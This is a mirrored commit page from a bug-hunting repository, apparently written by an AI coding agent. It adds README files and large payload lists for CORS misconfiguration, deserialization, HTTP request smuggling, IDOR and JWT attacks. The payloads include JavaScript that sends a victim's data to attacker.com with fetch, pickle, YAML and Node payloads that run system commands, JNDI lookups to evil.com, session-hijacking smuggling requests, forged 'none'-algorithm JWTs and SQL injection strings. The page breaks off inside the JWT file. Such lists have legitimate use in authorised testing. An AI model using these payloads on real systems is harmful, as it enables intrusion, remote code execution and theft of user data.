0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add comprehensive payloads and 4 new vulnerability types (SSTI, HTTP Request Smuggling, CORS, JWT)

Browse Source 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-05 14:50:15 +00:00
parent f2209e214f
commit 68b76036df
13 changed files with 2368 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
CORS-Misconfiguration/README.md
+35
View File
@@ -0,0 +1,35 @@
# CORS Misconfiguration
## Description
Cross-Origin Resource Sharing (CORS) misconfiguration occurs when a web application incorrectly configures the CORS headers, allowing unauthorized domains to access sensitive resources. This can lead to data theft, account compromise, and bypassing of the Same-Origin Policy.
## Common Misconfigurations
- **Wildcard Origin with Credentials** - `Access-Control-Allow-Origin: *` with `Access-Control-Allow-Credentials: true`
- **Null Origin Allowed** - Accepting `Origin: null`
- **Reflected Origin** - Reflecting any origin without validation
- **Subdomain Trust** - Trusting all subdomains including attacker-controlled ones
- **Pre-domain/Post-domain Trust** - Weak regex matching for origins
## Impact
- Steal sensitive user data
- Perform actions on behalf of users
- Access private API endpoints
- Read authentication tokens
- Bypass CSRF protections
## Common Attack Vectors
- API endpoints with sensitive data
- Authentication endpoints
- Profile information endpoints
- Admin panels
- Internal APIs exposed via CORS
## Testing Approach
1. Send requests with various `Origin` headers
2. Check if `Access-Control-Allow-Origin` reflects the attacker's origin
3. Verify if `Access-Control-Allow-Credentials: true` is set
4. Test with null origin, subdomains, and similar domains
5. Check for weak regex patterns in origin validation
## Payloads
See `cors-misconfiguration-payloads.txt` for a comprehensive list of CORS misconfiguration test payloads.
CORS-Misconfiguration/cors-misconfiguration-payloads.txt
+276
View File
@@ -0,0 +1,276 @@
# CORS Misconfiguration Payloads
# Basic Origin testing
Origin: https://evil.com
Origin: http://evil.com
Origin: https://attacker.com
Origin: http://attacker.com
# Null Origin (works in sandboxed iframes)
Origin: null
# Subdomain variations
Origin: https://evil.target.com
Origin: https://target.com.evil.com
Origin: https://subtarget.com
Origin: https://admin.target.com
Origin: https://api.target.com
# Pre-domain bypass
Origin: https://target.com.evil.com
Origin: https://wwwtarget.com
Origin: https://not-target.com
Origin: https://target.com-evil.com
Origin: https://target.com.attacker.com
# Post-domain bypass
Origin: https://evil.target.com
Origin: https://evil-target.com
Origin: https://eviltarget.com
# Protocol variations
Origin: http://target.com
Origin: https://target.com
Origin: ftp://target.com
Origin: file://target.com
# Port variations
Origin: https://target.com:8080
Origin: https://target.com:8443
Origin: https://target.com:443
Origin: https://target.com:80
# Case sensitivity bypass
Origin: https://TARGET.COM
Origin: https://Target.Com
Origin: https://TaRgEt.CoM
# Underscore in subdomain
Origin: https://evil_admin.target.com
Origin: https://admin_.target.com
# Special characters
Origin: https://target.com%0d%0aEvil: header
Origin: https://target.com%00.evil.com
Origin: https://target.com@evil.com
Origin: https://evil@target.com
# Regex bypass patterns
Origin: https://target.com.evil.com
Origin: https://evil.target.com.net
Origin: https://atarget.com
Origin: https://target.com.de
Origin: https://target.co.uk
Origin: https://target.org
# Localhost variations
Origin: http://localhost
Origin: http://127.0.0.1
Origin: http://0.0.0.0
Origin: http://[::1]
Origin: http://localhost.target.com
# File protocol
Origin: file://
Origin: file:///etc/passwd
# Wildcard subdomain bypass
Origin: https://anything.target.com
Origin: https://xyz123.target.com
Origin: https://hacker.target.com
# Pre-flight request headers
Access-Control-Request-Method: POST
Access-Control-Request-Method: PUT
Access-Control-Request-Method: DELETE
Access-Control-Request-Method: PATCH
Access-Control-Request-Headers: X-Custom-Header
Access-Control-Request-Headers: Authorization
Access-Control-Request-Headers: Content-Type
# Data exfiltration payload (JavaScript)
# For use when CORS is misconfigured
var req = new XMLHttpRequest();
req.open('GET', 'https://target.com/api/user/data', true);
req.withCredentials = true;
req.onload = function() {
fetch('https://attacker.com/steal?data=' + btoa(req.responseText));
};
req.send();
# Fetch API exploitation
fetch('https://target.com/api/sensitive', {
credentials: 'include'
}).then(r => r.text()).then(data => {
fetch('https://attacker.com/log?data=' + btoa(data));
});
# Testing for credential exposure
GET /api/user HTTP/1.1
Host: target.com
Origin: https://evil.com
Cookie: session=abc123
# WebSocket CORS bypass
var ws = new WebSocket('wss://target.com/socket');
ws.onmessage = function(event) {
fetch('https://attacker.com/log?data=' + btoa(event.data));
};
# Multiple Origin headers
Origin: https://target.com
Origin: https://evil.com
# Origin with credentials
Origin: https://user:pass@target.com
Origin: https://admin@target.com
# Homograph attacks (IDN)
Origin: https://tаrget.com # Cyrillic 'а'
Origin: https://tаrgеt.com # Cyrillic 'а' and 'е'
Origin: https://targеt.com # Cyrillic 'е'
# Bypass via special TLDs
Origin: https://target.com.local
Origin: https://target.com.internal
Origin: https://target.com.corp
# IPv6 localhost variations
Origin: http://[::1]
Origin: http://[0:0:0:0:0:0:0:1]
Origin: http://[0:0:0:0:0:0:0:0]
Origin: http://[::ffff:127.0.0.1]
# Private IP ranges
Origin: http://192.168.1.1
Origin: http://10.0.0.1
Origin: http://172.16.0.1
Origin: http://169.254.169.254
# CORS with reflected subdomains
Origin: https://xss.target.com
Origin: https://<script>.target.com
Origin: https://javascript:alert(1).target.com
# Bypass with URL encoding
Origin: https://%74%61%72%67%65%74.com
Origin: https://target%2ecom
# Double encoding
Origin: https://%2574%2561%2572%2567%2565%2574.com
# Unicode bypass
Origin: https://ⓣⓐⓡⓖⓔⓣ.com
Origin: https://𝓽𝓪𝓻𝓰𝓮𝓽.com
# Testing Access-Control-Allow-Methods
GET /api/admin HTTP/1.1
Host: target.com
Origin: https://evil.com
Access-Control-Request-Method: DELETE
# Testing Access-Control-Allow-Headers
GET /api/user HTTP/1.1
Host: target.com
Origin: https://evil.com
Access-Control-Request-Headers: X-Admin-Token
# Cache poisoning via CORS
GET /api/data HTTP/1.1
Host: target.com
Origin: https://evil.com
X-Forwarded-Host: evil.com
# CORS with authentication bypass
GET /api/sensitive HTTP/1.1
Host: target.com
Origin: https://evil.com
Cookie: session=victim_session_token
# Testing weak regex patterns
Origin: https://target.com.example.com
Origin: https://example.target.com.example.com
Origin: https://target_com.example.com
Origin: https://target-com.example.com
# Path traversal in Origin
Origin: https://target.com/../../evil.com
Origin: https://target.com/../evil.com
# Fragment identifier bypass
Origin: https://target.com#evil.com
Origin: https://target.com#@evil.com
# Query string in Origin (invalid but test anyway)
Origin: https://target.com?evil.com
Origin: https://target.com?redirect=evil.com
# Bypassing with trailing characters
Origin: https://target.com/
Origin: https://target.com\
Origin: https://target.com;
Origin: https://target.com,
# Mixed content bypass
Origin: http://target.com (when site uses HTTPS)
Origin: https://target.com (when site uses HTTP)
# Testing with data URI
Origin: data:text/html,<script>alert(1)</script>
# Testing with javascript URI
Origin: javascript:alert(1)
# Origin with username
Origin: https://admin:password@target.com
# Testing with blob URI
Origin: blob:https://target.com/uuid
# Custom protocol
Origin: custom://target.com
Origin: app://target.com
# Testing max-age for preflight
Access-Control-Max-Age: 86400
# Wildcard with specific paths
Origin: https://evil.com/api/public
# Testing exposed headers
Access-Control-Expose-Headers: Authorization, X-API-Key
# CORS on error pages
GET /404 HTTP/1.1
Host: target.com
Origin: https://evil.com
# CORS on redirect
GET /redirect HTTP/1.1
Host: target.com
Origin: https://evil.com
# Exploiting wildcard subdomains
Origin: https://attacker-controlled.target.com
Origin: https://s3bucket.target.com
Origin: https://malicious.pages.target.com
# Testing JSONP with CORS
GET /api/data?callback=alert HTTP/1.1
Host: target.com
Origin: https://evil.com
# WebRTC CORS bypass
var pc = new RTCPeerConnection();
pc.createDataChannel('');
pc.createOffer().then(offer => pc.setLocalDescription(offer));
# Service Worker CORS
self.addEventListener('fetch', event => {
event.respondWith(
fetch(event.request.url, {
mode: 'cors',
credentials: 'include'
})
);
});
Deserialization/deserialization-payloads.txt
+160
View File
@@ -53,3 +53,163 @@ Spring2
# Ruby Marshal
\x04\x08o:\x10User\x06:\x0arole:\x0aadmin
# Advanced Java gadget chains
# Apache Commons Collections
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors.InvokerTransformer
org.apache.commons.collections.functors.ChainedTransformer
org.apache.commons.collections.functors.ConstantTransformer
org.apache.commons.collections.keyvalue.TiedMapEntry
org.apache.commons.collections.map.LazyMap
# Spring Framework
org.springframework.context.support.ClassPathXmlApplicationContext
org.springframework.beans.factory.config.PropertyPathFactoryBean
# C3P0
com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase
com.mchange.v2.c3p0.JndiRefForwardingDataSource
# Hibernate
org.hibernate.engine.spi.TypedValue
org.hibernate.tuple.component.AbstractComponentTuplizer
# Vaadin
com.vaadin.data.util.NestedMethodProperty
com.vaadin.data.util.PropertysetItem
# Advanced PHP serialization
O:8:"stdClass":1:{s:4:"code";s:10:"phpinfo();";}
O:11:"PDOStatement":0:{}
a:2:{i:0;O:8:"stdClass":0:{}i:1;s:5:"admin";}
O:12:"SplFileObject":1:{s:0:"";s:11:"/etc/passwd";}
# PHP object injection with magic methods
O:10:"Evil_Class":1:{s:8:"filename";s:11:"/etc/passwd";}
O:4:"User":2:{s:2:"id";i:1;s:4:"role";s:5:"admin";}
O:7:"PhpCode":1:{s:4:"code";s:6:"system";}
# Advanced Python pickle
\x80\x03csubprocess\ncheck_output\n(S'ls'\ntR.
\x80\x03csubprocess\nPopen\n(S'calc'\ntR.
\x80\x03cos\nsystem\n(S'whoami'\ntR.
cos\nsystem\n(S'cat /etc/passwd'\ntR.
# Python pickle RCE variants
c__builtin__\neval\n(S'__import__("os").system("ls")'\ntR.
\x80\x03c__builtin__\nexec\n(S'import os;os.system("whoami")'\ntR.
# .NET BinaryFormatter
AAEAAAD/////AQAAAAAAAAAMAgAAAE1TeXN0ZW0u
AAEAAAD/////AQAAAAAAAAAEAQAAAClT
# .NET ObjectStateFormatter
/wEy
# .NET SoapFormatter
<SOAP-ENV:Envelope
# ViewState exploitation (.NET)
__VIEWSTATE=/wEPDwUKLTY5NDY
__VIEWSTATEGENERATOR=CA0B0334
# JSON deserialization with type confusion
{"$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework"}
{"__type":"System.IO.FileInfo"}
{"@class":"java.net.URL","val":"http://evil.com"}
# Jackson polymorphic deserialization
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:"}]
["org.apache.xbean.propertyeditor.JndiConverter",{"asText":"ldap://evil.com/"}]
["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"ldap://evil.com/","autoCommit":true}]
# Fastjson exploitation
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://evil.com/Exploit","autoCommit":true}
{"@type":"java.net.Inet4Address","val":"evil.com"}
{"@type":"java.net.URL","val":"http://evil.com"}
# YAML deserialization (Python)
!!python/object/apply:subprocess.Popen [['calc']]
!!python/object/new:os.system [calc]
!!python/object/apply:os.system ['whoami']
# YAML deserialization (Ruby)
--- !ruby/object:Gem::Installer
i: x
--- !ruby/object:Gem::Requirement
requirements: !ruby/object:Gem::Package::TarReader
# Node.js prototype pollution
{"__proto__":{"isAdmin":true}}
{"constructor":{"prototype":{"isAdmin":true}}}
{"__proto__":{"shell":"/bin/sh"}}
# Node.js VM escape
{"rce":"_$$ND_FUNC$$_function(){return require('child_process').execSync('whoami').toString()}()"}
{"eval":"_$$ND_FUNC$$_function(){return global.process.mainModule.require('child_process').execSync('id').toString()}()"}
# Ruby YAML deserialization
--- !ruby/object:Gem::Installer\ni: x\n--- !ruby/object:Gem::SpecFetcher\ni: y
!ruby/object:Gem::Requirement {requirements: [[!, !ruby/object:Gem::Package::TarReader {}}]}
# Java RMI exploitation
rmi://evil.com:1099/Object
rmi://127.0.0.1:1099/Exploit
# JNDI injection patterns
ldap://evil.com/Exploit
ldaps://evil.com/Exploit
rmi://evil.com/Exploit
dns://evil.com/Exploit
iiop://evil.com/Exploit
corba://evil.com/Exploit
# Java gadget chain references
ysoserial.payloads.CommonsCollections1
ysoserial.payloads.CommonsCollections2
ysoserial.payloads.CommonsCollections3
ysoserial.payloads.CommonsCollections4
ysoserial.payloads.CommonsCollections5
ysoserial.payloads.CommonsCollections6
ysoserial.payloads.CommonsCollections7
ysoserial.payloads.Groovy1
ysoserial.payloads.Spring1
ysoserial.payloads.Spring2
ysoserial.payloads.ROME
ysoserial.payloads.JDK7u21
ysoserial.payloads.Jython1
ysoserial.payloads.Click1
ysoserial.payloads.Wicket1
# Base64 encoded Java serialized objects
rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ==
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAU=
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldABA
# PHP Phar deserialization
phar://exploit.phar/test.txt
phar://./exploit.phar
phar://exploit.jpg/test.txt
# AMF (Action Message Format)
\x00\x03\x00\x00\x00\x01
# MessagePack
\x81\xa4eval\xa6system
# Pickle bytecode patterns
c__builtin__\ngetattr\n
c__builtin__\n__import__\n
cos\nsystem\n
csubprocess\ncall\n
csubprocess\ncheck_output\n
# Serialization headers detection
\xac\xed\x00\x05 # Java serialization
O: # PHP serialization
\x80\x03 # Python pickle protocol 3
\x80\x04 # Python pickle protocol 4
\x04\x08 # Ruby Marshal
AAEAAAD # .NET BinaryFormatter
/wE # .NET ObjectStateFormatter
HTTP-Request-Smuggling/README.md
+41
View File
@@ -0,0 +1,41 @@
# HTTP Request Smuggling
## Description
HTTP Request Smuggling occurs when the front-end and back-end servers disagree about where one request ends and the next begins. This vulnerability allows attackers to bypass security controls, gain unauthorized access, and poison web caches.
## Vulnerability Types
- **CL.TE** - Content-Length vs Transfer-Encoding
- **TE.CL** - Transfer-Encoding vs Content-Length
- **TE.TE** - Transfer-Encoding obfuscation
- **CL.CL** - Duplicate Content-Length headers
## Common Attack Vectors
- Front-end/Back-end server desynchronization
- Load balancer misconfigurations
- Reverse proxy issues
- CDN edge servers
- WAF bypass
## Impact
- Bypass security controls
- Web cache poisoning
- Cross-site scripting
- Request hijacking
- Credential theft
- Access other users' requests
## Testing Approach
1. Send requests with conflicting Content-Length and Transfer-Encoding headers
2. Observe timing differences and response variations
3. Test with different header obfuscation techniques
4. Verify if smuggled requests affect subsequent requests
## Common Vulnerable Configurations
- HAProxy + Apache
- Nginx + Apache
- AWS ALB + various backends
- Akamai + various backends
- Cloudflare + various backends
## Payloads
See `http-request-smuggling-payloads.txt` for a comprehensive list of HTTP Request Smuggling payloads.
HTTP-Request-Smuggling/http-request-smuggling-payloads.txt
+526
View File
@@ -0,0 +1,526 @@
# HTTP Request Smuggling Payloads
# CL.TE (Content-Length vs Transfer-Encoding)
# Front-end uses Content-Length, back-end uses Transfer-Encoding
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 6
Transfer-Encoding: chunked
0
G
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
# TE.CL (Transfer-Encoding vs Content-Length)
# Front-end uses Transfer-Encoding, back-end uses Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
5e
POST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
0
---
# TE.TE (Transfer-Encoding obfuscation)
# Both servers handle Transfer-Encoding but one can be obfuscated
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: x
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
# Transfer-Encoding obfuscation variants
Transfer-Encoding: chunked
Transfer-Encoding: xchunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding: chunked
Transfer-encoding: chunked
Transfer-Encoding: chunked
Transfer-Encoding: chunked;
Transfer-Encoding: chunked,
Transfer-Encoding: identity
Transfer-Encoding: identity, chunked
Transfer-Encoding: chunked, identity
Transfer-Encoding: chunked
Transfer-Encoding: identity
Transfer-Encoding: chunked
Transfer-Encoding : chunked
Transfer-Encoding:chunked
Transfer-Encoding:
chunked
Transfer-Encoding:
chunked
[space]Transfer-Encoding: chunked
Transfer-Encoding[space]: chunked
Transfer-Encoding:[space]chunked
Transfer-Encoding: chu nked
Transfer-Encoding: chunk ed
Transfer-Encoding: chun\x0bked
# CL.CL (Duplicate Content-Length)
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 8
Content-Length: 7
12345
SMUGGLED
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 8
Content-Length: 9
test=1
SMUGGLED
---
# Cache poisoning via request smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 130
Transfer-Encoding: chunked
0
GET /static/script.js HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Bypassing front-end security controls
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Length: 100
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For: 127.0.0.1
Content-Length: 10
x=
---
# Capturing other users' requests
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 230
Transfer-Encoding: chunked
0
POST /log HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 1000
comment=
---
# XSS via request smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GET /search?q=<script>alert(1)</script> HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Web cache deception
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 180
Transfer-Encoding: chunked
0
GET /static/include.js HTTP/1.1
Host: vulnerable-website.com
X-Ignore: X
GET /account HTTP/1.1
Host: vulnerable-website.com
---
# Exploiting different chunk handling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
96
POST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
csrf=token&action=delete
0
---
# Timing-based detection payload
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
1
Z
Q
---
# Header injection for smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 200
Transfer-Encoding: chunked
0
GET / HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: evil.com
Content-Length: 10
x=
---
# Session hijacking
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 250
Transfer-Encoding: chunked
0
POST /account/update HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
email=attacker@evil.com&session=
---
# Smuggling with newlines
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding:
chunked
Content-Length: 4
5c
SMUGGLED
0
---
# Smuggling with tabs
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4
5c
SMUGGLED
0
---
# HTTP/2 downgrade smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4
0
SMUGGLED
---
# Chunk size obfuscation
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
0000000000000000000a
SMUGGLED123
0
---
# Negative Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: -1
Transfer-Encoding: chunked
0
SMUGGLED
---
# Very large Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 999999999
Transfer-Encoding: chunked
0
SMUGGLED
---
# Mixed line endings
POST / HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
Content-Length: 4\r\n
Transfer-Encoding: chunked\n
\r\n
5c\r\n
SMUGGLED\r\n
0\r\n
\r\n
---
# Unicode in headers
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
TransferEncoding: identity
0
SMUGGLED
---
# Multiple Host headers
POST / HTTP/1.1
Host: vulnerable-website.com
Host: evil.com
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
---
# Smuggling to internal endpoints
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GET /internal/admin HTTP/1.1
Host: localhost
X-Forwarded-For: 127.0.0.1
Content-Length: 10
x=
---
# Cookie injection via smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 180
Transfer-Encoding: chunked
0
GET / HTTP/1.1
Host: vulnerable-website.com
Cookie: session=stolen_session_here
Content-Length: 10
x=
---
# Authorization bypass
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 200
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: vulnerable-website.com
Authorization: Bearer admin_token_here
Content-Length: 10
x=
---
# CRLF injection in chunks
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
0\r\n
\r\n
GET /admin HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
\r\n
---
# Smuggling via Content-Type
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
---
# Request line injection
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GPOST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Protocol smuggling (HTTP/1.1 -> HTTP/2)
POST / HTTP/1.1
Host: vulnerable-website.com
Upgrade: h2c
Connection: Upgrade, HTTP2-Settings
HTTP2-Settings: AAMAAABkAAQAAP__
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
IDOR/idor-payloads.txt
+177
View File
@@ -38,3 +38,180 @@
# Array/Multiple IDs
?id[]=1&id[]=2
?ids=1,2,3
# HTTP Methods for IDOR
GET /api/user/1
POST /api/user/1
PUT /api/user/1
DELETE /api/user/1
PATCH /api/user/1
# Path-based IDOR
/users/1/profile
/users/2/profile
/users/admin/profile
/api/v1/users/1
/api/v1/users/2
/api/v2/user/1/settings
/api/user/1/private
/api/user/2/documents
# Subdomain enumeration
user1.example.com
user2.example.com
admin.example.com
# GUID/UUID variations
?id=00000000-0000-0000-0000-000000000000
?id=ffffffff-ffff-ffff-ffff-ffffffffffff
?id=12345678-1234-1234-1234-123456789012
?uuid=a1b2c3d4-e5f6-4a5b-8c7d-9e0f1a2b3c4d
# Base64 encoded IDs
?id=MQ==
?id=Mg==
?id=YWRtaW4=
?user=dXNlcjE=
# Hash-based IDs
?id=5f4dcc3b5aa765d61d8327deb882cf99
?id=098f6bcd4621d373cade4e832627b4f6
?token=abc123def456
# Numeric variations
?id=0001
?id=0010
?id=0100
?id=1000
?user_id=00001
?customer_id=00100
# Special characters in IDs
?id=../1
?id=../../2
?id=..%2f1
?id=%2e%2e%2f1
# API endpoint variations
/api/orders/1
/api/orders/2
/api/invoices/1
/api/transactions/1
/api/messages/1
/api/posts/1/edit
/api/comments/1/delete
# Cookie-based IDOR
Cookie: user_id=1
Cookie: user_id=2
Cookie: session_id=user1
Cookie: account=1
# Header-based IDOR
X-User-Id: 1
X-User-Id: 2
X-Account-Id: 1
X-Customer-Id: 2
# JSON body IDOR
{"user_id": 1}
{"user_id": 2}
{"account_id": 1}
{"profile_id": 2}
# Compound IDs
?user_id=1&account_id=1
?id=1&type=admin
?user=1&role=admin
# Email-based enumeration
?email=user1@example.com
?email=user2@example.com
?email=admin@example.com
?email=test@test.com
# Phone number enumeration
?phone=1234567890
?phone=+11234567890
?mobile=9876543210
# Date-based IDs
?date=2024-01-01
?created_at=2024-01-01
?year=2024&month=01&day=01
# Predictable patterns
?ref=INV-001
?ref=INV-002
?order=ORD-1000
?order=ORD-1001
?ticket=TKT-001
# Encoded variations
?id=1%00
?id=1%0a
?id=1%0d
?id=1%20
# Boolean values
?admin=true
?admin=false
?is_admin=1
?is_admin=0
?superuser=true
# Wildcard attempts
?id=*
?user=*
?search=*
# Negative numbers
?id=-1
?id=-10
?id=-100
?offset=-1
# Large numbers
?id=999999999
?id=2147483647
?id=9999999999999
# Float/Decimal
?id=1.0
?id=1.5
?amount=0.01
# SQL-style injection in IDOR
?id=1' OR '1'='1
?id=1 OR 1=1
?id=1 UNION SELECT * FROM users
# NoSQL-style injection in IDOR
?id[$ne]=1
?id[$gt]=0
?user[$regex]=admin
# XML-style
?id=<id>1</id>
?user=<user>admin</user>
# GraphQL IDOR
?query={user(id:1){name,email}}
?query={user(id:2){name,email}}
# REST variations
/users/me
/users/self
/users/current
/users/1
/users/2
# Hyphenated IDs
?id=user-1
?id=account-2
?ref=invoice-001
# Underscore IDs
?id=user_1
?id=account_2
?id=customer_001
JWT-Vulnerabilities/README.md
+47
View File
@@ -0,0 +1,47 @@
# JWT (JSON Web Token) Vulnerabilities
## Description
JWT vulnerabilities occur when JSON Web Tokens are improperly implemented or validated, allowing attackers to forge tokens, escalate privileges, or bypass authentication mechanisms. JWTs are widely used for authentication and authorization in modern web applications.
## Common Vulnerabilities
- **None Algorithm** - Setting `alg` to `none` to bypass signature verification
- **Algorithm Confusion** - Switching from RS256 to HS256
- **Weak Secret Key** - Using weak or default secrets for HMAC
- **Key Injection** - Injecting public key in JWK header
- **Token Expiration** - Missing or improper `exp` validation
- **SQL Injection in Claims** - Injecting SQL in JWT claims
- **XSS in Claims** - Storing and reflecting XSS payloads in JWT
## JWT Structure
```
header.payload.signature
```
- **Header**: Contains algorithm and token type
- **Payload**: Contains claims (user data)
- **Signature**: Cryptographic signature
## Common Attack Vectors
- Authentication endpoints
- Authorization headers
- Cookie-based JWT storage
- URL parameters with JWT
- Local/Session storage
## Impact
- Authentication bypass
- Privilege escalation
- Account takeover
- Access to unauthorized resources
- Identity spoofing
## Testing Approach
1. Decode the JWT to examine header and payload
2. Test with `alg: none` in header
3. Test algorithm confusion (RS256 → HS256)
4. Brute force weak secrets
5. Modify claims (user ID, role, permissions)
6. Test token expiration validation
7. Check for sensitive data exposure in payload
## Payloads
See `jwt-vulnerabilities-payloads.txt` for a comprehensive list of JWT attack payloads.
JWT-Vulnerabilities/jwt-vulnerabilities-payloads.txt
+259
View File
@@ -0,0 +1,259 @@
# JWT Vulnerabilities Payloads
# None Algorithm Attack
# Change alg to "none" and remove signature
# Original: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
# Modified: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"none","typ":"JWT"}
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"None","typ":"JWT"}
eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"NONE","typ":"JWT"}
eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"nOnE","typ":"JWT"}
eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Algorithm Confusion Attack (RS256 to HS256)
# Change algorithm from RS256 to HS256 and sign with public key
# Header: {"alg":"HS256","typ":"JWT"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature_here
# Weak Secret Brute Force
# Common weak secrets to test
secret
password
123456
12345678
admin
test
jwt
key
default
secret123
password123
qwerty
abc123
letmein
changeme
welcome
monkey
12345
iloveyou
trustno1
dragon
# Modified Claims - Privilege Escalation
# Payload: {"user":"admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Payload: {"role":"admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4ifQ.
# Payload: {"admin":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6dHJ1ZX0.
# Payload: {"isAdmin":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlfQ.
# Payload: {"permissions":["admin","read","write","delete"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwZXJtaXNzaW9ucyI6WyJhZG1pbiIsInJlYWQiLCJ3cml0ZSIsImRlbGV0ZSJdfQ.
# User ID Manipulation
# Payload: {"userId":1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjF9.
# Payload: {"sub":"1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIn0.
# Payload: {"id":1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MX0.
# Token Expiration Bypass
# Payload: {"exp":9999999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjk5OTk5OTk5OTl9.
